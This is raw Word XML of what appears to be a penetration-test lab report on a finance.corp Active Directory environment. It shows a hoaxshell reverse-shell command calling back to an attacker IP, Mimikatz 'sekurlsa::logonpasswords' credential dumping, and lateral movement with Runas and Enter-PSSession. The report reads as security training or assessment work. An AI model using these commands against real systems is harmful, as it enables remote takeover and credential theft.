        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63D33">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Python3 hoaxshell.py -s 172.16.99.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE299D2" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A20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7C637E" wp14:editId="7101B322">
            <wp:extent cx="5943600" cy="2894618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DAC3" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A20C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ter getting the reverse shell I copied the payload and paste in mgmtsrv powershell session.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C6400" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A20C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="292963EE" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00A20C3E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7522E7" w14:textId="3703D5AF" w:rsidR="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A20C3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4221CD" wp14:editId="7947152A">
            <wp:extent cx="5943009" cy="2589530"/>
            <wp:effectExtent l="0" t="0" r="63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1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="25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8B5AA" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A20C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fter pasting the payload in powershell, I press enter and I got the reverse shell in my host machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EDE1A5" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRDefault="001772E6" w:rsidP="00A20C3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94071F6" wp14:editId="0860995A">
            <wp:extent cx="5943600" cy="2894618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5B31" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRPr="00E408CB" w:rsidRDefault="001772E6" w:rsidP="00E408CB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46477321"/>
      <w:r w:rsidRPr="00E40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mikatz:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="2A15685A" w14:textId="77777777" w:rsidR="001772E6" w:rsidRPr="00A75819" w:rsidRDefault="00A75819" w:rsidP="00A7581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w I downloaded the Invoke-Mimikatz.ps1 and run </w:t>
      </w:r>
      <w:r w:rsidRPr="00A75819">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Invoke-Mimikatz -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A75819">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Command  </w:t>
      </w:r>
      <w:bookmarkStart w:id="21" w:name="_Hlk146462739"/>
      <w:r w:rsidRPr="00A75819">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A75819">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> “sekurlsa::logonpasswords” ’</w:t>
      </w:r>
      <w:r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  <w:t>. Mimikatz didn’t disappoint me and presented me with techservice user credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125120C9" w14:textId="77777777" w:rsidR="001772E6" w:rsidRDefault="00F23C10" w:rsidP="00A20C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E7C0E6" wp14:editId="61E02207">
            <wp:extent cx="5943600" cy="2894618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7B90" w14:textId="77777777" w:rsidR="00F23C10" w:rsidRDefault="00F23C10" w:rsidP="00A20C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8644BA" wp14:editId="300779C6">
            <wp:extent cx="5943600" cy="2894618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81428" w14:textId="77777777" w:rsidR="00F23C10" w:rsidRPr="00F23C10" w:rsidRDefault="00F23C10" w:rsidP="005F140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used the credentials found with mimikatz to open a powershell as techservice user, by using the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7A425D" w14:textId="77777777" w:rsidR="005F1403" w:rsidRPr="005F1403" w:rsidRDefault="005F1403" w:rsidP="005F1403">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Runas </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidRPr="005F1403">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:b/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="005F1403">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:b/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>user:techservice@tech.finance.corp</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“powershell.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5098C3" w14:textId="77777777" w:rsidR="005F1403" w:rsidRDefault="005F1403" w:rsidP="00A20C3E"/>
    <w:p w14:paraId="6B016CC5" w14:textId="77777777" w:rsidR="00F23C10" w:rsidRPr="005F1403" w:rsidRDefault="005F1403" w:rsidP="005F1403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>And</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="73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I</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="73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found</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="73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out</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="73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from</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="73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bloodhound</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="73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that</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="73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techservice</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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user</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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can</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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Enter-PSSession</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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on techsrv30 machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B6AC31" w14:textId="77777777" w:rsidR="005F1403" w:rsidRPr="001772E6" w:rsidRDefault="005F1403" w:rsidP="00A2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D7717B" wp14:editId="49293946">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-82378</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2660</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5848864" cy="3237470"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="2032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864" cy="3237470"/>
                          <a:chOff x="1470" y="-6741"/>
                          <a:chExt cx="9450" cy="6285"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="33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" y="-6704"/>
                            <a:ext cx="9360" cy="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docshape54"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1470" y="-6741"/>
                            <a:ext cx="9450" cy="6285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9450"/>
                              <a:gd name="T2" fmla="+- 0 -6718 -6741"/>
                              <a:gd name="T3" fmla="*/ -6718 h 6285"/>
                              <a:gd name="T4" fmla="+- 0 10898 1470"/>
                              <a:gd name="T5" fmla="*/ T4 w 9450"/>
                              <a:gd name="T6" fmla="+- 0 -6718 -6741"/>
                              <a:gd name="T7" fmla="*/ -6718 h 6285"/>
                              <a:gd name="T8" fmla="+- 0 10898 1470"/>
                              <a:gd name="T9" fmla="*/ T8 w 9450"/>
                              <a:gd name="T10" fmla="+- 0 -6741 -6741"/>
                              <a:gd name="T11" fmla="*/ -6741 h 6285"/>
                              <a:gd name="T12" fmla="+- 0 10898 1470"/>
                              <a:gd name="T13" fmla="*/ T12 w 9450"/>
                              <a:gd name="T14" fmla="+- 0 -478 -6741"/>
                              <a:gd name="T15" fmla="*/ -478 h 6285"/>
                              <a:gd name="T16" fmla="+- 0 10920 1470"/>
                              <a:gd name="T17" fmla="*/ T16 w 9450"/>
                              <a:gd name="T18" fmla="+- 0 -478 -6741"/>
                              <a:gd name="T19" fmla="*/ -478 h 6285"/>
                              <a:gd name="T20" fmla="+- 0 1493 1470"/>
                              <a:gd name="T21" fmla="*/ T20 w 9450"/>
                              <a:gd name="T22" fmla="+- 0 -478 -6741"/>
                              <a:gd name="T23" fmla="*/ -478 h 6285"/>
                              <a:gd name="T24" fmla="+- 0 1493 1470"/>
                              <a:gd name="T25" fmla="*/ T24 w 9450"/>
                              <a:gd name="T26" fmla="+- 0 -456 -6741"/>
                              <a:gd name="T27" fmla="*/ -456 h 6285"/>
                              <a:gd name="T28" fmla="+- 0 1493 1470"/>
                              <a:gd name="T29" fmla="*/ T28 w 9450"/>
                              <a:gd name="T30" fmla="+- 0 -6718 -6741"/>
                              <a:gd name="T31" fmla="*/ -6718 h 6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50" h="6285">
                                <a:moveTo>
                                  <a:pt x="0" y="23"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="9428" y="23"/>
                                </a:lnTo>
                                <a:moveTo>
                                  <a:pt x="9428" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="9428" y="6263"/>
                                </a:lnTo>
                                <a:moveTo>
                                  <a:pt x="9450" y="6263"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="23" y="6263"/>
                                </a:lnTo>
                                <a:moveTo>
                                  <a:pt x="23" y="6285"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="23" y="23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45993" id="Group 32" o:spid="_x0000_s1026" style="position:absolute;margin-left:-6.5pt;margin-top:.2pt;width:460.55pt;height:254.9pt;z-index:251658240;mso-position-horizontal-relative:margin" coordorigin="1470,-6741" coordsize="9450,62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zOj&#10;r/wkHia81hvmtLLfYWPoWB/fyD6soQH/AKZt/eq94q1Ce005beybbqN9ILW1OM7XYEl8eiKGc/7u&#10;O9X9L02DR9OtrG2Upb28axoCcnAGMk9z6nvT2RL1ZZooop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Zuv3k1tYiK1bbe3Ti3tzjO1iCS+O4VQz477cd6AehT0xf7Y1+61Nuba&#10;03WVp6Fgf3z/APfShPby27NW9UFhYw6ZYwWluu2GBBGgJycAY5Pc+9T02JIK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sqyX+0tXnvjzDbbrW39zn963/fShOenlnHDVY1a5&#10;kgtRHbtturhhDCcA7WIJLYPB2qGbHfbjvVi0tY7G1ht4RtiiQIoJycAYHPemLclooopD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3" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:1515;top:-6704;width:9360;height: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">
                  <v:imagedata r:id="rId37" o:title=""/>
                </v:shape>
                <v:shape id="docshape54" o:spid="_x0000_s1028" style="position:absolute;left:1470;top:-6741;width:9450;height:6285;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9450,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" path="m,23r9428,m9428,r,6263m9450,6263r-9427,m23,6285l23,23e" filled="f" strokeweight="2.25pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,-6718;9428,-6718;9428,-6741;9428,-478;9450,-478;23,-478;23,-456;23,-6718" o:connectangles="0,0,0,0,0,0,0,0"/>
                </v:shape>
                <w10:wrap anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF8998F" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A20C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E27E0E8" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRPr="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A20C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AEC1C18" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRPr="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A20C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EFE8935" w14:textId="77777777" w:rsidR="00BF0C8D" w:rsidRPr="00A20C3E" w:rsidRDefault="00BF0C8D" w:rsidP="00A20C3E">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E26A7A" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRPr="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="00A20C3E"/>
    <w:p w14:paraId="6A1BBB4F" w14:textId="77777777" w:rsidR="00A47787" w:rsidRDefault="00A47787" w:rsidP="00A4778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EDC29B" w14:textId="77777777" w:rsidR="00A47787" w:rsidRPr="00A47787" w:rsidRDefault="00A47787" w:rsidP="002B2926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704F8647" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35DF470F" w14:textId="77777777" w:rsidR="002B2926" w:rsidRDefault="002B2926" w:rsidP="00F57D78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B5C844" w14:textId="77777777" w:rsidR="002B2926" w:rsidRPr="00F57D78" w:rsidRDefault="002B2926" w:rsidP="00F57D78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45D0ACEC" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D78"/>
    <w:p w14:paraId="7186B9DD" w14:textId="77777777" w:rsidR="005F1403" w:rsidRDefault="005F1403" w:rsidP="005F1403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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the</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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techservice</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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session,</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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I</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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confirmed</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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the</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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administrative</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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access</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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by</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="76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running</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="76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a PowerShell Remoting session on the machin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8955536" w14:textId="77777777" w:rsidR="005F1403" w:rsidRDefault="005F1403" w:rsidP="005F1403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter-PSSession -ComputerName </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>techsrv30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F2D141" w14:textId="77777777" w:rsidR="005F1403" w:rsidRDefault="005F1403" w:rsidP="005F1403">
      <w:pPr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F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>And</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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I</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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have</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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successfully</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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got</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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command</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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execution</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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on</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>techsrv30</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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z w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>box</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1403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5F1403">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>too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30305687" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="005F1403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4552A63F" w14:textId="32EFAF99" w:rsidR="005F1403" w:rsidRDefault="005F1403" w:rsidP="005F140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D87181B" wp14:editId="4877B1E0">
            <wp:extent cx="5943009" cy="2600041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8"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="26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BAE9E" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="005F1403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC08DA4" w14:textId="62D1ACB6" w:rsidR="005F1403" w:rsidRDefault="005F1403" w:rsidP="005F140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8DC7AC5" wp14:editId="690E409D">
            <wp:extent cx="5943009" cy="2621061"/>
            <wp:effectExtent l="0" t="0" r="63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2"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="262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67C63" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="005F140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DE9118" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="00A87F1A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48712939" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="00A87F1A"/>
    <w:p w14:paraId="384751F0" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="00A87F1A"/>
    <w:p w14:paraId="231F430C" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRPr="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="00A87F1A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc146476887"/>
      <w:bookmarkStart w:id="23" w:name="_Toc146477322"/>
      <w:r w:rsidRPr="00A87F1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DBSERVER31:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="015BFB8E" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="00A87F1A"/>
    <w:p w14:paraId="40CE220B" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="00A87F1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A87F1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Now in order to run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A87F1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A87F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7F1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87F1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> did the same thing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A87F1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87F1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> did on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A87F1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mgmtsrv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A87F1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87F1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>box.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> I first generate a reverse shell payload using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hoaxshe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th </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>i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ress of my host(kali) machine and then copy that payload and paste in powershell session running as techservice and press enter and then I got the reverse shell on my host machine.</w:t>
      </w:r>
